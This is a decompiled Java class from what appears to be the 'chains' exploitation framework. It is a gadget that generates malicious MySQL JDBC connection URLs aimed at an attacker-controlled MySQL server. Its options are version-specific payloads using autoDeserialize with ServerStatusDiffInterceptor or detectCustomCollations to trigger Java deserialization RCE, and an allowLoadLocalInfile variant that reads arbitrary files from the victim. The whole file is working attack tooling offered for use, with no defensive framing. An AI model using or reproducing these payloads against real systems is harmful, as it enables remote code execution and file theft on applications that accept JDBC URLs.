package com.ar3h.chains.gadget.impl.common.jdbc;

import cn.hutool.db.dialect.DriverNamePool;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;

@GadgetAnnotation(name = "Mysql JDBC URL", description = "适用于jdbc rce场景，jdbc转为Java反序列化", dependencies = {"mysql-connector-java"}, priority = 40)
@GadgetTags(tags = {Tag.MysqlJdbcUrl, Tag.JdbcUrlChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/MysqlJdbc.class */
public class MysqlJdbc implements Gadget {

    @Param(name = "Mysql Jdbc URL Payload 类型", type = ParamType.Choice, choices = {@Choice("read"), @Choice("detectCustomCollations_5.1.19-5.1.28"), @Choice("detectCustomCollations_5.1.29-5.1.48"), @Choice("detectCustomCollations_6.0.2-6.0.6"), @Choice("ServerStatusDiffInterceptor_5.1.11-5.x.xx"), @Choice("ServerStatusDiffInterceptor_6.x"), @Choice("ServerStatusDiffInterceptor_8.0.20")})
    public String type = "ServerStatusDiffInterceptor_5.1.11-5.x.xx";

    @Param(name = "用户名", description = "通常这里用来给mysql jdbc漏洞利用工具传参，输出不同的反序列化Payload")
    public String user = "root";

    @Param(name = "mysql ip:port", description = "eg: 172.16.1.2:3306")
    public String host = "172.16.1.2:3306";
    public String driverClassName;

    public String getObject() {
        String str = null;
        String str2 = this.type;
        boolean z = -1;
        switch (str2.hashCode()) {
            case -2022275415:
                if (str2.equals("detectCustomCollations_5.1.29-5.1.48")) {
                    z = 2;
                    break;
                }
                break;
            case -1137151342:
                if (str2.equals("ServerStatusDiffInterceptor_5.1.11-5.x.xx")) {
                    z = 4;
                    break;
                }
                break;
            case -214821014:
                if (str2.equals("detectCustomCollations_5.1.19-5.1.28")) {
                    z = true;
                    break;
                }
                break;
            case 3496342:
                if (str2.equals("read")) {
                    z = false;
                    break;
                }
                break;
            case 1355674988:
                if (str2.equals("ServerStatusDiffInterceptor_6.x")) {
                    z = 5;
                    break;
                }
                break;
            case 1391242374:
                if (str2.equals("ServerStatusDiffInterceptor_8.0.20")) {
                    z = 6;
                    break;
                }
                break;
            case 1737756110:
                if (str2.equals("detectCustomCollations_6.0.2-6.0.6")) {
                    z = 3;
                    break;
                }
                break;
        }
        switch (z) {
            case false:
                str = "jdbc:mysql://" + this.host + "/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?detectCustomCollations=true&autoDeserialize=true&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?detectCustomCollations=true&autoDeserialize=true&user=" + this.user;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            case true:
                str = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = DriverNamePool.DRIVER_MYSQL_V6;
                break;
            default:
                ThrowsUtil.throwGadgetException("type is not support: " + this.type);
                break;
        }
        return str;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        String object = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return object;
    }
}
